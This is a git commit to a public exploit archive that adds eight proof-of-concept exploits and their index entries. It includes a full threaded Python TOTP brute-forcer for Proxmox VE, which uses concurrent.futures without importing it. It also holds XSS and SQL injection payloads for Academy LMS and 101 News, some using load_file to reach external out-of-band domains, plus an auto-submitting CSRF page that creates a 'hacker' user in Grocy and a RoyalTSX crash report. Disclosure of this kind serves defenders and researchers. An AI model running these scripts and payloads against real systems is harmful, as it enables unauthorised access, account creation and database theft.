DB: 2024-02-01

8 changes to exploits/shellcodes/ghdb Proxmox VE - TOTP Brute Force RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities 101 News 1.0 - Multiple-SQLi Academy LMS 6.2 - Reflected XSS Academy LMS 6.2 - SQL Injection Grocy <=4.0.2 - CSRF
2024-02-01 00:16:32 +00:00 · 2024-02-01 00:16:32 +00:00 · 2aed99237c
commit 2aed99237c
parent a5920da7af
8 changed files with 437 additions and 0 deletions
--- a/exploits/linux/remote/51763.py
+++ b/exploits/linux/remote/51763.py
@ -0,0 +1,81 @@
+# Exploit Title: Proxmox VE TOTP Brute Force
+# Date: 09/23/2023
+# Exploit Author: Cory Cline, Gabe Rust
+# Vendor Homepage: https://www.proxmox.com/en/
+# Software Link: http://download.proxmox.com/iso/
+# Version: 5.4 - 7.4-1
+# Tested on: Debian
+# CVE : CVE-2023-43320
+
+import time
+import requests
+import urllib.parse
+import json
+import os
+import urllib3
+
+urllib3.disable_warnings()
+threads=25
+
+#################### REPLACE THESE VALUES #########################
+password="KNOWN PASSWORD HERE"
+username="KNOWN USERNAME HERE"
+target_url="https://HOST:PORT"
+##################################################################
+
+ticket=""
+ticket_username=""
+CSRFPreventionToken=""
+ticket_data={}
+
+auto_refresh_time = 20 # in minutes - 30 minutes before expiration
+last_refresh_time = 0
+
+tokens = [];
+
+for num in range(0,1000000):
+    tokens.append(str(num).zfill(6))
+
+def refresh_ticket(target_url, username, password):
+    global CSRFPreventionToken
+    global ticket_username
+    global ticket_data
+    refresh_ticket_url = target_url + "/api2/extjs/access/ticket"
+    refresh_ticket_cookies = {}
+    refresh_ticket_headers = {}
+    refresh_ticket_data = {"username": username, "password": password, "realm": "pve", "new-format": "1"}
+    ticket_data_raw = urllib.parse.unquote(requests.post(refresh_ticket_url, headers=refresh_ticket_headers, cookies=refresh_ticket_cookies, data=refresh_ticket_data, verify=False).text)
+    ticket_data = json.loads(ticket_data_raw)
+    CSRFPreventionToken = ticket_data["data"]["CSRFPreventionToken"]
+    ticket_username = ticket_data["data"]["username"]
+
+def attack(token):
+    global last_refresh_time
+    global auto_refresh_time
+    global target_url
+    global username
+    global password
+    global ticket_username
+    global ticket_data
+    if ( int(time.time()) > (last_refresh_time + (auto_refresh_time * 60)) ):
+        refresh_ticket(target_url, username, password)
+        last_refresh_time = int(time.time())
+
+    url = target_url + "/api2/extjs/access/ticket"
+    cookies = {}
+    headers = {"Csrfpreventiontoken": CSRFPreventionToken}
+    stage_1_ticket = str(json.dumps(ticket_data["data"]["ticket"]))[1:-1]
+    stage_2_ticket = stage_1_ticket.replace('\\"totp\\":', '\"totp\"%3A').replace('\\"recovery\\":', '\"recovery\"%3A')
+    data = {"username": ticket_username, "tfa-challenge": stage_2_ticket, "password": "totp:" + str(token)}
+    response = requests.post(url, headers=headers, cookies=cookies, data=data, verify=False)
+    if(len(response.text) > 350):
+        print(response.text)
+        os._exit(1)
+
+while(1):
+    refresh_ticket(target_url, username, password)
+    last_refresh_time = int(time.time())
+
+    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
+        res = [executor.submit(attack, token) for token in tokens]
+        concurrent.futures.wait(res)
--- a/exploits/macos/remote/51764.txt
+++ b/exploits/macos/remote/51764.txt
@ -0,0 +1,149 @@
+RoyalTSX 6.0.1 RTSZ File Handling Heap Memory Corruption PoC
+
+
+Vendor: Royal Apps GmbH
+Web page: https://www.royalapps.com
+Affected version: 6.0.1.1000 (macOS)
+
+Summary: Royal TS is an ideal tool for system engineers and
+other IT professionals who need remote access to systems with
+different protocols. Not only easy to use, it enables secure
+multi-user document sharing.
+
+Desc: The application receives SIGABRT after RAPortCheck.createNWConnection()
+function is handling the SecureGatewayHost object in the RoyalTSXNativeUI.
+When the hostname has an array of around 1600 bytes and Test Connection is
+clicked the app crashes instantly.
+
+Tested on: MacOS 13.5.1 (Ventura)
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2023-5788
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5788.php
+
+
+05.09.2023
+
+--
+
+
+-------------------------------------
+Translated Report (Full Report Below)
+-------------------------------------
+
+Process:               RoyalTSX [23807]
+Path:                  /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX
+Identifier:            com.lemonmojo.RoyalTSX.App
+Version:               6.0.1 (6.0.1.1000)
+Code Type:             X86-64 (Native)
+Parent Process:        launchd [1]
+User ID:               503
+
+Date/Time:             2023-09-05 16:09:46.6361 +0200
+OS Version:            macOS 13.5.1 (22G90)
+Report Version:        12
+Bridge OS Version:     7.6 (20P6072)
+
+Time Awake Since Boot: 21000 seconds
+Time Since Wake:       1106 seconds
+
+System Integrity Protection: enabled
+
+Crashed Thread:        0  tid_103  Dispatch queue: com.apple.main-thread
+
+Exception Type:        EXC_BAD_ACCESS (SIGABRT)
+Exception Codes:       KERN_INVALID_ADDRESS at 0x0000000000000050
+Exception Codes:       0x0000000000000001, 0x0000000000000050
+
+Termination Reason:    Namespace SIGNAL, Code 6 Abort trap: 6
+Terminating Process:   RoyalTSX [23807]
+
+VM Region Info: 0x50 is not in any region.  Bytes before following region: 140737488273328
+      REGION TYPE                    START - END         [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
+      UNUSED SPACE AT START
+--->
+      shared memory            7ffffffec000-7ffffffed000 [    4K] r-x/r-x SM=SHM
+
+Application Specific Information:
+abort() called
+
+
+Thread 0 Crashed:: tid_103 Dispatch queue: com.apple.main-thread
+0   libsystem_kernel.dylib        	    0x7ff809ef7202 __pthread_kill + 10
+1   libsystem_pthread.dylib       	    0x7ff809f2eee6 pthread_kill + 263
+2   libsystem_c.dylib             	    0x7ff809e55b45 abort + 123
+3   libmonosgen-2.0.1.dylib       	       0x1028daa1b altstack_handle_and_restore + 235
+4   libmonosgen-2.0.1.dylib       	       0x102879db6 summarize_frame_internal + 310
+5   libmonosgen-2.0.1.dylib       	       0x102879f66 summarize_frame + 198
+6   libmonosgen-2.0.1.dylib       	       0x10287578f mono_walk_stack_full + 1135
+7   libmonosgen-2.0.1.dylib       	       0x102873944 mono_summarize_managed_stack + 100
+8   libmonosgen-2.0.1.dylib       	       0x102a0f478 mono_threads_summarize_execute_internal + 1256
+9   libmonosgen-2.0.1.dylib       	       0x102a0f8aa mono_threads_summarize + 346
+10  libmonosgen-2.0.1.dylib       	       0x1028e0b67 mono_dump_native_crash_info + 855
+11  libmonosgen-2.0.1.dylib       	       0x10287864e mono_handle_native_crash + 318
+12  libmonosgen-2.0.1.dylib       	       0x1027d1966 mono_crashing_signal_handler + 86
+13  libsystem_platform.dylib      	    0x7ff809f5c5ed _sigtramp + 29
+14  ???                           	       0x101e9502c ???
+15  RoyalTSXNativeUI              	       0x109e50012 RAPortCheck.createNWConnection() + 290
+16  RoyalTSXNativeUI              	       0x109e4f6d2 RAPortCheck.connect() + 242
+17  RoyalTSXNativeUI              	       0x10a021c70 static RASecureGatewayPropertyPageHelper.testConnection(hostname:port:logger:localizer:parentWindow:progressIndicator:testConnectionButton:) + 592
+18  RoyalTSXNativeUI              	       0x10a0b94e7 RAPropertyPageSecureGatewayMain.testConnection() + 359
+19  RoyalTSXNativeUI              	       0x10a0b9573 @objc RAPropertyPageSecureGatewayMain.buttonTestConnection_action(_:) + 51
+20  AppKit                        	    0x7ff80d29742c -[NSApplication(NSResponder) sendAction:to:from:] + 323
+21  AppKit                        	    0x7ff80d2972b0 -[NSControl sendAction:to:] + 86
+22  AppKit                        	    0x7ff80d2971e2 __26-[NSCell _sendActionFrom:]_block_invoke + 131
+23  AppKit                        	    0x7ff80d2970eb -[NSCell _sendActionFrom:] + 171
+24  AppKit                        	    0x7ff80d297031 -[NSButtonCell _sendActionFrom:] + 96
+25  AppKit                        	    0x7ff80d293ee5 NSControlTrackMouse + 1816
+26  AppKit                        	    0x7ff80d2937a9 -[NSCell trackMouse:inRect:ofView:untilMouseUp:] + 121
+27  AppKit                        	    0x7ff80d29367c -[NSButtonCell trackMouse:inRect:ofView:untilMouseUp:] + 606
+28  AppKit                        	    0x7ff80d292ac0 -[NSControl mouseDown:] + 659
+29  AppKit                        	    0x7ff80d290f9d -[NSWindow(NSEventRouting) _handleMouseDownEvent:isDelayedEvent:] + 4330
+30  AppKit                        	    0x7ff80d2087d7 -[NSWindow(NSEventRouting) _reallySendEvent:isDelayedEvent:] + 404
+31  AppKit                        	    0x7ff80d208427 -[NSWindow(NSEventRouting) sendEvent:] + 345
+32  AppKit                        	    0x7ff80d206e01 -[NSApplication(NSEvent) sendEvent:] + 345
+33  AppKit                        	    0x7ff80d3413ae -[NSApplication _doModalLoop:peek:] + 360
+34  AppKit                        	    0x7ff80d4c2219 __33-[NSApplication runModalSession:]_block_invoke_2 + 69
+35  AppKit                        	    0x7ff80d4c21c1 __33-[NSApplication runModalSession:]_block_invoke + 78
+36  AppKit                        	    0x7ff80d33f773 _NSTryRunModal + 100
+37  AppKit                        	    0x7ff80d4c20be -[NSApplication runModalSession:] + 128
+38  RoyalTSXNativeUI              	       0x109f17044 RAPropertiesWindowController._showModal() + 628
+39  RoyalTSXNativeUI              	       0x109f17548 @objc RAPropertiesWindowController._showModal() + 24
+40  Foundation                    	    0x7ff80ae84951 -[NSObject(NSThreadPerformAdditions) performSelector:onThread:withObject:waitUntilDone:modes:] + 379
+41  Foundation                    	    0x7ff80ae84676 -[NSObject(NSThreadPerformAdditions) performSelectorOnMainThread:withObject:waitUntilDone:] + 124
+42  libffi.dylib                  	    0x7ff81a5fd8c2 ffi_call_unix64 + 82
+43  libffi.dylib                  	    0x7ff81a5fd214 ffi_call_int + 830
+
+Thread 0 crashed with X86 Thread State (64-bit):
+  rax: 0x0000000000000000  rbx: 0x00007ff84d608700  rcx: 0x00007ff7be10fbc8  rdx: 0x0000000000000000
+  rdi: 0x0000000000000103  rsi: 0x0000000000000006  rbp: 0x00007ff7be10fbf0  rsp: 0x00007ff7be10fbc8
+   r8: 0x0000000000000212   r9: 0x00007fafaeaf64a8  r10: 0x0000000000000000  r11: 0x0000000000000246
+  r12: 0x0000000000000103  r13: 0x00007ff7be110418  r14: 0x0000000000000006  r15: 0x0000000000000016
+  rip: 0x00007ff809ef7202  rfl: 0x0000000000000246  cr2: 0x00007ff84d611068
+
+Logical CPU:     0
+Error Code:      0x02000148
+Trap Number:     133
+
+Thread 0 instruction stream:
+  0f 84 24 01 00 00 49 8b-79 08 4c 89 45 c0 89 4d  ..$...I.y.L.E..M
+  d4 48 89 55 c8 4d 89 cc-e8 5d 79 0e 00 48 89 c3  .H.U.M...]y..H..
+  4b 8d 7c 3e 04 48 8b 73-30 ba 8c 00 00 00 e8 07  K.|>.H.s0.......
+  7f 25 00 4c 8b 45 c0 48-8b 43 58 4b 89 84 3e a0  .%.L.E.H.CXK..>.
+  00 00 00 41 8b 44 24 04-43 89 84 3e 90 00 00 00  ...A.D$.C..>....
+  48 8b 43 38 4b 89 84 3e-a8 00 00 00 48 8b 43 60  H.C8K..>....H.C`
+ [8b]40 50 43 89 84 3e b0-00 00 00 8b 43 40 43 89  .@PC..>.....C@C.	<==
+  84 3e b4 00 00 00 48 8b-45 c8 43 89 84 3e 98 00  .>....H.E.C..>..
+  00 00 8b 45 d4 43 89 84-3e 94 00 00 00 eb 18 48  ...E.C..>......H
+  8d 05 80 ff 26 00 e9 96-00 00 00 43 c7 84 3e 90  ....&......C..>.
+  00 00 00 ff ff ff ff 49-8b 45 10 48 8b 18 41 83  .......I.E.H..A.
+  38 00 74 24 4b 8d 7c 3e-04 4d 89 c4 e8 69 d8 14  8.t$K.|>.M...i..
+
+Binary Images:
+       0x101deb000 -        0x101df6fff com.lemonmojo.RoyalTSX.App (6.0.1) <328845a4-2e68-3c0f-a495-033ac725bb43> /Applications/Royal TSX.app/Contents/MacOS/RoyalTSX
+...
+...
--- a/exploits/multiple/webapps/51762.txt
+++ b/exploits/multiple/webapps/51762.txt
@ -0,0 +1,14 @@
+# Exploit Title: GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities
+# Date: 25/9/2023
+# Exploit Author: Syed Affan Ahmed (ZEROXINN)
+# Vendor Homepage: https://www.embedthis.com/goahead/
+# Affected Version: 2.5 may be others.
+# Tested On Version: 2.5 in ZTE AC3630
+
+---------------------------POC---------------------------
+
+GoAhead Web Server Version 2.5 is prone to Multiple HTML-injection vulnerabilities due to inadequate input validation.
+
+HTML Injection can cause the ability to execute within the context of that site.
+
+http://192.168.0.1/goform/formTest?name=<h1>Hello</h1>&address=<h1>World</h1>
--- a/exploits/php/webapps/51757.txt
+++ b/exploits/php/webapps/51757.txt
@ -0,0 +1,40 @@
+# Exploit Title: Academy LMS 6.2 - Reflected XSS
+# Exploit Author: CraCkEr
+# Date: 29/08/2023
+# Vendor: Creativeitem
+# Vendor Homepage: https://creativeitem.com/
+# Software Link: https://demo.creativeitem.com/academy/
+# Tested on: Windows 10 Pro
+# Impact: Manipulate the content of the site
+# CVE: CVE-2023-4973
+# CWE: CWE-79 - CWE-74 - CWE-707
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+The attacker can send to victim a link containing a malicious URL in an email or instant message
+can perform a wide variety of actions, such as stealing the victim's session token or login credentials
+
+
+Path: /academy/tutor/filter
+
+GET parameter 'searched_word' is vulnerable to XSS
+GET parameter 'searched_tution_class_type[]' is vulnerable to XSS
+GET parameter 'searched_price_type[]' is vulnerable to XSS
+GET parameter 'searched_duration[]' is vulnerable to XSS
+
+https://website/academy/tutor/filter?searched_word=[XSS]&searched_tution_class_type%5B%5D=[XSS]&price_min=1&price_max=9&searched_price_type%5B%5D=[XSS]&searched_duration%5B%5D=[XSS]
+
+
+XSS Payload:
+
+acoa5"><script>alert(1)</script>dyzs0
+
+
+[-] Done
--- a/exploits/php/webapps/51758.txt
+++ b/exploits/php/webapps/51758.txt
@ -0,0 +1,46 @@
+# Exploit Title: Academy LMS 6.2 - SQL Injection
+# Exploit Author: CraCkEr
+# Date: 29/08/2023
+# Vendor: Creativeitem
+# Vendor Homepage: https://creativeitem.com/
+# Software Link: https://demo.creativeitem.com/academy/
+# Tested on: Windows 10 Pro
+# Impact: Database Access
+# CVE: CVE-2023-4974
+# CWE: CWE-89 / CWE-74 / CWE-707
+
+
+## Greetings
+
+The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka
+CryptoJob (Twitter) twitter.com/0x0CryptoJob
+
+
+## Description
+
+SQL injection attacks can allow unauthorized access to sensitive data, modification of
+data and crash the application or make it unavailable, leading to lost revenue and
+damage to a company's reputation.
+
+
+Path: /academy/tutor/filter
+
+GET parameter 'price_min' is vulnerable to SQL Injection
+GET parameter 'price_max' is vulnerable to SQL Injection
+
+https://website/academy/tutor/filter?searched_word=&searched_tution_class_type%5B%5D=1&price_min=[SQLi]&price_max=[SQLi]&searched_price_type%5B%5D=hourly&searched_duration%5B%5D=0
+
+---
+Parameter: price_min (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: searched_word=&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0
+
+Parameter: price_max (GET)
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
+    Payload: searched_word=&searched_tution_class_type[]=1&price_min=1&price_max=(SELECT(0)FROM(SELECT(SLEEP(9)))a)&searched_price_type[]=hourly&searched_duration[]=0
+---
+
+
+[-] Done
--- a/exploits/php/webapps/51759.txt
+++ b/exploits/php/webapps/51759.txt
@ -0,0 +1,48 @@
+## Title: 101 News-1.0 Multiple-SQLi
+## Author: nu11secur1ty
+## Date: 09/16/2023
+## Vendor: https://mayurik.com/
+## Software: https://www.sourcecodester.com/php/16067/best-online-news-portal-project-php-free-download.html
+## Reference: https://portswigger.net/web-security/sql-injection
+
+## Description:
+The searchtitle parameter appears to be vulnerable to SQL injection
+attacks. The payload '+(select
+load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.oastify.com\\utu'))+'
+was submitted in the searchtitle parameter. This payload injects a SQL
+sub-query that calls MySQL's load_file function with a UNC file path
+that references a URL on an external domain. The application
+interacted with that domain, indicating that the injected SQL query
+was executed.
+
+
+[+]Payload:
+```mysql
+---
+Parameter: searchtitle (POST)
+    Type: boolean-based blind
+    Title: OR boolean-based blind - WHERE or HAVING clause
+    Payload: searchtitle=-7320%' OR 3167=3167 AND 'urvA%'='urvA
+
+    Type: time-based blind
+    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+    Payload: searchtitle=814271'+(select
+load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
+AND (SELECT 8775 FROM (SELECT(SLEEP(15)))yMEL) AND 'gPWH%'='gPWH
+
+    Type: UNION query
+    Title: MySQL UNION query (NULL) - 3 columns
+    Payload: searchtitle=814271'+(select
+load_file('\\\\sple0q0yfc2wv1hbekfzk7vtikoec6gu7xvpif64.tupaputka.com\\utu'))+'%'
+UNION ALL SELECT
+NULL,NULL,NULL,NULL,NULL,CONCAT(0x71627a6a71,0x4b6d704e6546715a6662496571705179434d6d5a71586b567a4278464c564d61766174626f787063,0x7170767071),NULL,NULL#
+
+## Reproduce:
+https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/101%20News-1.0
+
+## Proof and Exploit:
+https://www.nu11secur1ty.com/2023/09/101-news-10-multiple-sqli.html
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+nu11secur1ty <http://nu11secur1ty.com/>
--- a/exploits/php/webapps/51760.txt
+++ b/exploits/php/webapps/51760.txt
@ -0,0 +1,52 @@
+# Exploit Title: Grocy <= 4.0.2 CSRF Vulnerability
+# Application: Grocy
+# Version: <= 4.0.2
+# Date: 09/21/2023
+# Exploit Author: Chance Proctor
+# Vendor Homepage: https://grocy.info/
+# Software Link: https://github.com/grocy/grocy
+# Tested on: Linux
+# CVE : CVE-2023-42270
+
+
+
+Overview
+==================================================
+When creating a new user in Grocy 4.0.2, the new user request is made using JSON formatting.
+This makes it easy to adjust your request since it is a known format.
+There is also no CSRF Token or other methods of verification in place to verify where the request is coming from.
+This allows for html code to generate a new user as long as the target is logged in and has Create User Permissions.
+
+
+
+Proof of Concept
+==================================================
+Host the following html code via a XSS or delivery via a phishing campaign:
+
+	<html>
+	<form action="/api/users" method="post" enctype="application/x-www-form-urlencoded">
+	<input name='username' value='hacker' type='hidden'>
+	<input name='password' value='test' type='hidden'>
+	<input type=submit>
+	</form>
+	<script>
+	history.pushState('','', '/');
+	document.forms[0].submit();
+	</script>
+	</html>
+
+
+If a user is logged into the Grocy Webapp at time of execution, a new user will be created in the app with the following credentials
+
+	Username: hacker
+	Password: test
+
+Note:
+In order for this to work, the target must have Create User Permissions.
+This is enabled by default.
+
+
+
+Proof of Exploit/Reproduce
+==================================================
+http://xploit.sh/posts/cve-2023-42270/
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -8568,6 +8568,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 4312,exploits/linux/remote/4312.c,"ProFTPd 1.x - 'mod_tls' Remote Buffer Overflow",2007-08-24,netris,remote,linux,21,2007-08-23,2017-08-29,1,,,,,http://www.exploit-db.comproftpd-1.3.0a.tar.gz,
 15449,exploits/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,remote,linux,,2010-11-07,2016-12-04,1,CVE-2010-4221,,,http://www.exploit-db.com/screenshots/idlt15500/screen-shot-2010-11-07-at-10044-pm.png,http://www.exploit-db.comproftpd-basic_1.3.3a-4_i386.deb,
 16921,exploits/linux/remote/16921.rb,"ProFTPd-1.3.3c - Backdoor Command Execution (Metasploit)",2010-12-03,Metasploit,remote,linux,,2010-12-03,2011-03-06,1,OSVDB-69562,"Metasploit Framework (MSF)",,,,
+51763,exploits/linux/remote/51763.py,"Proxmox VE - TOTP Brute Force",2024-01-31,"Cory Cline_ Gabe Rust",remote,linux,,2024-01-31,2024-01-31,0,,,,,,
 39499,exploits/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,remote,linux,,2016-02-26,2016-12-04,0,,,,,,
 652,exploits/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",remote,linux,8080,2004-11-22,2016-04-19,1,OSVDB-12111;CVE-2004-1120,,,,http://www.exploit-db.comprozilla-1.3.6.tar.gz,
 806,exploits/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String",2005-02-09,"Serkan Akpolat",remote,linux,8080,2005-02-08,2016-04-28,1,OSVDB-14181;CVE-2005-0523,,,,http://www.exploit-db.comprozilla_1.3.6.orig.tar.gz,
@ -9196,6 +9197,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 41443,exploits/macos/remote/41443.html,"Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read",2017-02-23,"Google Security Research",remote,macos,,2017-02-23,2017-04-05,1,CVE-2017-2361;HT207483,Remote,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1040
 41964,exploits/macos/remote/41964.html,"Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free",2017-05-04,"saelo & niklasb",remote,macos,,2017-05-04,2017-05-05,1,CVE-2017-2491,,,,,https://phoenhex.re/2017-05-04/pwn2own17-cachedcall-uaf
 42125,exploits/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,remote,macos,,2017-06-06,2017-06-06,0,CVE-2017-2536,,,,,https://phoenhex.re/2017-06-02/arrayspread
+51764,exploits/macos/remote/51764.txt,"RoyalTSX 6.0.1 - RTSZ File Handling Heap Memory Corruption PoC",2024-01-31,LiquidWorm,remote,macos,,2024-01-31,2024-01-31,0,,,,,,
 45998,exploits/macos/remote/45998.rb,"Safari - Proxy Object Type Confusion (Metasploit)",2018-12-14,Metasploit,remote,macos,,2018-12-14,2018-12-14,1,CVE-2018-4404;CVE-2018-4233,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/cc7cb7302ef43478292f684f473fadb00f9b4344/modules/exploits/osx/browser/safari_proxy_object_type_confusion.rb
 46932,exploits/macos/remote/46932.txt,"Typora 0.9.9.24.6 - Directory Traversal",2019-05-27,"Dhiraj Mishra",remote,macos,,2019-05-27,2019-06-19,0,CVE-2019-12137,,,http://www.exploit-db.com/screenshots/idlt47000/typora.png,,
 41449,exploits/macos/webapps/41449.html,"Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",webapps,macos,,2017-02-24,2017-02-24,1,CVE-2017-2363;HT207487;HT207485;HT207484;HT207482,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=1049
@ -11829,6 +11831,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html
 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,,
 42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
+51762,exploits/multiple/webapps/51762.txt,"GoAhead Web Server 2.5 - 'goform/formTest' Multiple HTML Injection Vulnerabilities",2024-01-31,"Syed Affan Ahmed (ZEROXINN)",webapps,multiple,,2024-01-31,2024-01-31,0,,,,,,
 35237,exploits/multiple/webapps/35237.txt,"Gogs - 'label' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple,80,2014-11-14,2017-11-14,0,CVE-2014-8681;OSVDB-114644,,,,,
 35238,exploits/multiple/webapps/35238.txt,"Gogs - 'users'/'repos' '?q' SQL Injection",2014-11-14,"Timo Schmid",webapps,multiple,,2014-11-14,2017-11-14,0,CVE-2014-8682;OSVDB-114646;OSVDB-114645,,,,,
 48027,exploits/multiple/webapps/48027.txt,"Google Invisible RECAPTCHA 3 - Spoof Bypass",2020-02-07,Matamorphosis,webapps,multiple,,2020-02-07,2020-02-07,0,,,,,,
@ -13102,6 +13105,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 42531,exploits/php/webapps/42531.txt,"(Bitcoin / Dogecoin) PHP Cloud Mining Script - Authentication Bypass",2017-08-21,"Ihsan Sencan",webapps,php,,2017-08-21,2017-08-22,0,,,,,,
 4896,exploits/php/webapps/4896.pl,"0DayDB 2.3 - 'id' Remote Authentication Bypass",2008-01-11,Pr0metheuS,webapps,php,,2008-01-10,2016-10-26,1,,,,,,
 26561,exploits/php/webapps/26561.txt,"1-2-3 Music Store 1.0 - 'Process.php' SQL Injection",2005-11-23,r0t,webapps,php,,2005-11-23,2013-07-03,1,CVE-2005-3855;OSVDB-21074,,,,,https://www.securityfocus.com/bid/15544/info
+51759,exploits/php/webapps/51759.txt,"101 News 1.0 - Multiple-SQLi",2024-01-31,nu11secur1ty,webapps,php,,2024-01-31,2024-01-31,0,,,,,,
 3832,exploits/php/webapps/3832.txt,"1024 CMS 0.7 - 'download.php' Remote File Disclosure",2007-05-02,Dj7xpl,webapps,php,,2007-05-01,2016-11-21,1,OSVDB-35542;CVE-2007-2507,,,,,
 18000,exploits/php/webapps/18000.txt,"1024 CMS 1.1.0 Beta - 'force_download.php' Local File Inclusion",2011-10-19,"Sangyun YOO",webapps,php,,2011-10-19,2011-10-19,0,OSVDB-83431,,,,,
 35598,exploits/php/webapps/35598.txt,"1024 CMS 1.1.0 Beta - Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure & Demetris Papapetrou",webapps,php,,2011-04-08,2014-12-23,1,,,,,,https://www.securityfocus.com/bid/47282/info
@ -13330,6 +13334,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45600,exploits/php/webapps/45600.txt,"Academic Timetable Final Build 7.0b - Cross-Site Request Forgery (Add Admin)",2018-10-15,"Ihsan Sencan",webapps,php,80,2018-10-15,2018-10-18,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comAcademic_Timetable_Final_Build_v70.zip,
 51654,exploits/php/webapps/51654.txt,"Academy LMS 6.0 - Reflected XSS",2023-08-04,CraCkEr,webapps,php,,2023-08-04,2023-08-04,0,CVE-2023-4119,,,,,
 51702,exploits/php/webapps/51702.txt,"Academy LMS 6.1 - Arbitrary File Upload",2023-09-04,CraCkEr,webapps,php,,2023-09-04,2023-09-04,0,,,,,,
+51757,exploits/php/webapps/51757.txt,"Academy LMS 6.2 - Reflected XSS",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,,
+51758,exploits/php/webapps/51758.txt,"Academy LMS 6.2 - SQL Injection",2024-01-31,CraCkEr,webapps,php,,2024-01-31,2024-01-31,0,,,,,,
 36110,exploits/php/webapps/36110.txt,"ACal 2.2.6 - 'calendar.php' Cross-Site Scripting",2011-09-02,T0xic,webapps,php,,2011-09-02,2015-04-18,1,,,,,http://www.exploit-db.comACal-2.2.6.zip,https://www.securityfocus.com/bid/49442/info
 1763,exploits/php/webapps/1763.txt,"ACal 2.2.6 - 'day.php' Remote File Inclusion",2006-05-07,PiNGuX,webapps,php,,2006-05-06,2015-04-18,1,OSVDB-25340;CVE-2006-2261,,,,http://www.exploit-db.comACal-2.2.6.zip,
 38697,exploits/php/webapps/38697.txt,"ACal 2.2.6 - 'view' Local File Inclusion",2013-08-15,ICheer_No0M,webapps,php,,2013-08-15,2015-11-15,1,OSVDB-96304,,,,,https://www.securityfocus.com/bid/61801/info
@ -19315,6 +19321,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 11107,exploits/php/webapps/11107.txt,"gridcc script 1.0 - SQL Injection / Cross-Site Scripting",2010-01-11,Red-D3v1L,webapps,php,,2010-01-10,,1,,,,,,
 45795,exploits/php/webapps/45795.txt,"Grocery crud 1.6.1 - 'search_field' SQL Injection",2018-11-06,"Loading Kura Kura",webapps,php,80,2018-11-06,2018-11-07,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comgrocery-crud-1.6.1.zip,
 48792,exploits/php/webapps/48792.txt,"grocy 2.7.1 - Persistent Cross-Site Scripting",2020-09-07,"Mufaddal Masalawala",webapps,php,,2020-09-07,2020-09-07,0,,,,,,
+51760,exploits/php/webapps/51760.txt,"Grocy <=4.0.2 - CSRF",2024-01-31,"Chance Proctor",webapps,php,,2024-01-31,2024-01-31,0,,,,,,
 51526,exploits/php/webapps/51526.txt,"Groomify v1.0 - SQL Injection",2023-06-19,"Ahmet Ümit BAYRAM",webapps,php,,2023-06-19,2023-06-19,0,,,,,,
 7954,exploits/php/webapps/7954.txt,"groone glinks 2.1 - Remote File Inclusion",2009-02-03,"k3vin mitnick",webapps,php,,2009-02-02,,1,OSVDB-51821;CVE-2009-0463,,,,,
